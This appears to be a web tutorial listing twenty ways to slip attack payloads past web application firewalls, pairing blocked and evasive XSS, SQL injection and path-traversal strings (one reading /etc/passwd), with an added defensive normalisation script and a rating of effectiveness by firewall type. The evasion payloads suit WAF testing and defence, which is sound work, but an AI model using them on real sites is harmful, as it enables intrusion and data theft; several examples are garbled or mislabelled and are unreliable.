
Mastering Web App Firewall Evasion: Techniques and Best Practices


The following is a list of very specific hacking techniques you can use to work around (evade) firewalls. Keep in mind that there are about a dozen types of firewalls, and these techniques work against only a portion of them.

Here’s a detailed explanation for each technique, including how to do it, a basic blocked request, and an updated request that may bypass the WAF:

1. URL Encoding Technique

How to do it:
Encode special characters in the payload using URL encoding (percent-encoding) to bypass WAF detection.

Blocked original request:

<script>alert('XSS')</script>

Updated with URL encoding:

%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

2. Unicode Technique

How to do it:
Convert characters in the payload to their Unicode equivalents to evade detection.

Blocked original request:

<script>alert('XSS')</script>

Updated with Unicode encoding:

\u003Cscript\u003Ealert('XSS')\u003C/script\u003E

3. HTML Rendering Technique

How to do it:
Use HTML entities to encode characters in the payload, which may render correctly in the browser but evade the WAF.

Blocked original request:

<script>alert('XSS')</script>

Updated with HTML entities:

&lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;

4. Mixed Encoding Technique

How to do it:
Combine multiple encoding techniques (e.g., URL encoding and HTML entities) in a single payload to confuse the WAF.

Blocked original request:

<script>alert('XSS')</script>

Updated with mixed encoding:

%3Cscript%3Ealert%28%26%2339%3BXSS%26%2339%3B%29%3C%2Fscript%3E

5. Case Manipulation

How to do it:
Mix uppercase and lowercase characters in the payload so that case-sensitive pattern matching no longer recognizes it.

Blocked original request:

<script>confirm()</script>

Updated with case-switching:

<ScrIpT>confirm()</sCRiPt>

6. Bypassing Filters with Comments

How to do it:
Insert comments or extraneous characters within the payload to break up the patterns the WAF is looking for.

Blocked original request:

SELECT * FROM users WHERE id=1;

Updated with comments:

SELECT/*comment*/ * FROM users WHERE id=1;

7. Parameter Pollution

How to do it:
Send multiple parameters with the same name in a single request to confuse the WAF or web application.

Blocked original request:

GET /search?q=malicious_query

Updated with parameter pollution:

GET /search?q=benign_query&q=malicious_query

8. Path Traversal with Double Encoding

How to do it:
Use double encoding to bypass WAF rules that only check for single-encoded sequences.

Blocked original request:

GET /../../etc/passwd

Updated with double encoding:

GET /%252e%252e%252f%252e%252e%252fetc%252fpasswd

9. Customizing User-Agent or Referrer Headers

How to do it:
Modify the User-Agent or Referer header, since some WAFs apply different rule sets depending on the values of these headers.

Blocked original request:

GET /admin HTTP/1.1
User-Agent: NormalBrowser

Updated with a custom User-Agent:

GET /admin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36

10. Time-based SQL Injection (Blind SQL Injection)

How to do it:
Use time delays in SQL injection to infer information from the database without directly retrieving data.

Blocked original request:

GET /search?q=' OR 1=1; --

Updated with time-based SQL injection:

GET /search?q='; IF (1=1) WAITFOR DELAY '00:00:05'; --

11. HTTP Parameter Tampering

How to do it:
Modify parameters in HTTP requests, particularly POST requests, to bypass WAF rules focused on GET requests.

Blocked original request:

POST /login HTTP/1.1
username=admin&password=123456

Updated with parameter tampering:

POST /login HTTP/1.1
username=admin&password=wrong_password

12. Payload Fragmentation

How to do it:
Split the payload across multiple requests or packets to avoid detection by the WAF.

Blocked original request:

<script>alert('XSS')</script>

Updated with payload fragmentation:

<script>aler
t('XSS')</script>

13. Testing and Logging Analysis

How to do it:
Analyze WAF logs and responses to identify which payloads are being blocked and adjust accordingly.

Blocked original request:

GET /admin HTTP/1.1

Updated based on log analysis:

GET /admin.php HTTP/1.1

14. Wildcard Obfuscation

How to do it:
Use wildcard characters in a way that confuses the WAF's pattern matching.

Blocked original request:

SELECT * FROM users WHERE username='admin';

Updated with wildcard obfuscation:

SELECT * FROM users WHERE username LIKE 'adm%';

15. Token Breaker Technique

How to do it:
Insert characters or elements that break the tokens the WAF uses to identify malicious patterns.

Blocked original request:

SELECT * FROM users WHERE id=1;

Updated with token breaking:

SELEC + T * FROM users WHERE id=1;

16. Tabs and Line Feed Technique

How to do it:
Insert tabs (\t) or line feeds (\n) within payloads to disrupt the pattern matching of the WAF.

Blocked original request:

<script>alert('XSS')</script>

Updated with tabs and line feeds:

<script>\n\talert('XSS')</script>

17. Uninitialized Variable Technique

How to do it:
Use uninitialized or rarely used variables in the payload to confuse the WAF’s detection algorithms.

Blocked original request:

int x = 1; return x;

Updated with uninitialized variable:

int x; return x = 1;

18. Newline Technique

How to do it:
Introduce newline characters within a payload to break up malicious patterns the WAF is scanning for.

Blocked original request:

<script>alert('XSS')</script>

Updated with newline characters:

<script>
alert('XSS')
</script>

19. Junk Character Technique

How to do it:
Insert random or irrelevant characters into the payload that the target application will ignore, but which might cause the WAF to overlook the attack.

Blocked original request:

<script>alert('XSS')</script>

Updated with junk characters:

<scri%00pt>alert('XSS')</scri%00pt>

20. Dynamic Payload Generation Technique

How to do it:
Generate payloads dynamically, so they change on each request, making it difficult for the WAF to recognize and block them.

Blocked original request:

<script>alert('XSS')</script>

Updated with dynamic payload generation:

<script>eval(String.fromCharCode(97,108,101,114,116)('XSS'))</script>
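Every encoding, comment, case, NUL-byte and whitespace trick in the list above works only when the WAF matches the raw bytes instead of the form the backend will eventually interpret. As an added example that is not part of the original lesson, the Python below canonicalises a request parameter (repeated URL decoding, HTML entity decoding, `\uXXXX` decoding, NUL removal, comment stripping, whitespace collapsing and case folding) before any rule is applied, so one rule catches each variant from techniques 1 to 6, 8, 16, 18 and 19; the signature list and the names `canonicalise` and `is_blocked` are constructed for this example, not taken from any real rule set.

```python
import html
import re
from urllib.parse import unquote

# Signatures a rule might match AFTER canonicalisation (constructed for this
# example; a production rule set such as the OWASP CRS is far larger).
SIGNATURES = [
    re.compile(r"<script\b"),             # the <script> tag from the XSS examples
    re.compile(r"\bselect\b.+\bfrom\b"),  # SQL read, incl. the comment/wildcard cases
    re.compile(r"\bwaitfor\s+delay\b"),   # time-based blind SQL injection
    re.compile(r"\.\.[/\\]"),             # path traversal (../ or ..\)
]

def canonicalise(value: str, rounds: int = 3) -> str:
    """Reduce the encoded variants from the lesson to one plain form.
    Decoding repeats (bounded by `rounds`) so that double encoding
    (%252e -> %2e -> .) and mixed URL/HTML encoding are both flattened."""
    s = value
    for _ in range(rounds):
        before = s
        s = unquote(s)                                        # %3C -> <
        s = html.unescape(s)                                  # &lt; &#x27; -> < '
        s = re.sub(r"\\u([0-9a-fA-F]{4})",
                   lambda m: chr(int(m.group(1), 16)), s)     # \u003C -> <
        if s == before:
            break                                             # nothing left to decode
    s = s.replace("\x00", "")                                 # junk NUL bytes (%00)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)              # inline SQL comments
    s = re.sub(r"\s+", " ", s)                                # tabs, line feeds, newlines
    return s.lower()                                          # case manipulation

def is_blocked(value: str) -> bool:
    """True when any signature matches the canonical form of `value`."""
    return any(sig.search(canonicalise(value)) for sig in SIGNATURES)

if __name__ == "__main__":
    # Constructed samples: the lesson's encoded payloads, all reduced to one form.
    for sample in [
        "%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E",       # 1. URL encoding
        r"\u003Cscript\u003Ealert('XSS')\u003C/script\u003E",  # 2. Unicode escapes
        "&lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;",   # 3. HTML entities
        "SELECT/*comment*/ * FROM users WHERE id=1;",            # 6. comments
        "%252e%252e%252f%252e%252e%252fetc%252fpasswd",          # 8. double encoding
        "<scri%00pt>alert('XSS')</scri%00pt>",                   # 19. junk NUL byte
        "benign search term",                                    # legitimate input
    ]:
        print(is_blocked(sample), repr(canonicalise(sample)))
```

ModSecurity expresses the same normalisation through transformation functions such as `t:urlDecodeUni`, `t:htmlEntityDecode`, `t:removeNulls`, `t:removeComments`, `t:compressWhitespace` and `t:lowercase`; their order and repetition matter, as the double-encoding case shows.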

How Effective are these techniques mentioned above?

The firewall evasion techniques we discussed generally aim to bypass specific types of firewalls, particularly those that perform deep packet inspection or application-level filtering, like Web Application Firewalls (WAFs) and Next-Generation Firewalls (NGFWs). However, the effectiveness of these techniques can vary depending on the type of firewall, its configuration, and its specific capabilities. Here's how these techniques might interact with different types of firewalls:

1. Packet-Filtering Firewalls

  • Effectiveness of Techniques:
    • Packet-filtering firewalls primarily inspect IP addresses, port numbers, and protocols. Techniques like Case Manipulation or Tabs and Line Feed might not be relevant here since this type of firewall does not inspect payload content. Parameter Pollution might still work if the firewall is filtering based on specific parameters.
    • Token Breaker or Wildcard Obfuscation might bypass simple filtering rules if the firewall is configured to block specific commands or keywords in headers or URLs.

2. Stateful Inspection Firewalls

  • Effectiveness of Techniques:
    • Stateful firewalls track the state of connections, so techniques like HTTP Parameter Tampering might not work if the state of the connection is being closely monitored.
    • Payload Fragmentation might be more effective if the firewall is not capable of reassembling fragmented payloads for inspection.

3. Proxy Firewalls (Application-Level Gateways)

  • Effectiveness of Techniques:
    • Proxy firewalls inspect traffic at the application layer, so many of the techniques such as Unicode Encoding, HTML Rendering, Case Manipulation, and Mixed Encoding could be effective if the proxy is not configured to decode or normalize these variations.
    • Bypassing Filters with Comments and Dynamic Payload Generation may also be effective depending on the proxy’s ability to interpret the payload correctly.

4. Next-Generation Firewalls (NGFW)

  • Effectiveness of Techniques:
    • NGFWs are designed to detect and block more sophisticated threats, so techniques like Time-based SQL Injection and Wildcard Obfuscation might be less effective, especially if the NGFW includes Intrusion Prevention Systems (IPS) that recognize these patterns.
    • Techniques like Dynamic Payload Generation could still work if the payloads are sufficiently obfuscated or randomized.

5. Unified Threat Management (UTM) Firewalls

  • Effectiveness of Techniques:
    • UTMs include a variety of security functions, so a combination of techniques might be necessary to bypass them. Token Breaker and Uninitialized Variable Techniques might evade some of the automated detection rules, but their overall effectiveness will depend on the specific UTM configuration.

6. Virtual and Cloud Firewalls

  • Effectiveness of Techniques:
    • These firewalls often mimic the functionality of traditional firewalls but operate in virtualized environments. Techniques that rely on exploiting specific protocol weaknesses (like Path Traversal with Double Encoding or Tabs and Line Feed Techniques) might still work if the virtual or cloud firewall is not configured to normalize or decode these patterns.

7. Host-Based Firewalls

  • Effectiveness of Techniques:
    • Host-based firewalls typically focus on protecting a single device. Techniques like Junk Character Insertion or Unicode Technique might not be effective unless the host-based firewall inspects application-layer data.
    • Customizing User-Agent or Referrer Headers might work if the firewall is filtering based on these headers.

8. Hardware Firewalls

  • Effectiveness of Techniques:
    • Hardware firewalls, particularly those focused on network-layer filtering, might not be affected by many of the techniques aimed at WAFs or application-level filtering. Techniques like Packet Fragmentation or HTTP Parameter Tampering might still work, depending on how the hardware firewall is configured to handle such anomalies.

9. Web Application Firewalls (WAFs)

  • Effectiveness of Techniques:
    • The discussed techniques are particularly relevant to WAFs, as they are designed to protect against application-layer attacks like SQL injection, XSS, and others. Techniques like Case Manipulation, Bypassing Filters with Comments, and HTML Rendering Techniques are directly aimed at confusing or evading WAF detection.

Conclusion

Not all techniques are universally effective across all firewall types. Their success largely depends on the specific type of firewall, its configuration, and the nature of the traffic it inspects. Some techniques are more suited for application-layer firewalls like WAFs, while others might target simpler firewalls that filter at the network layer. Understanding the specific capabilities and configurations of the firewall in question is essential when applying evasion techniques.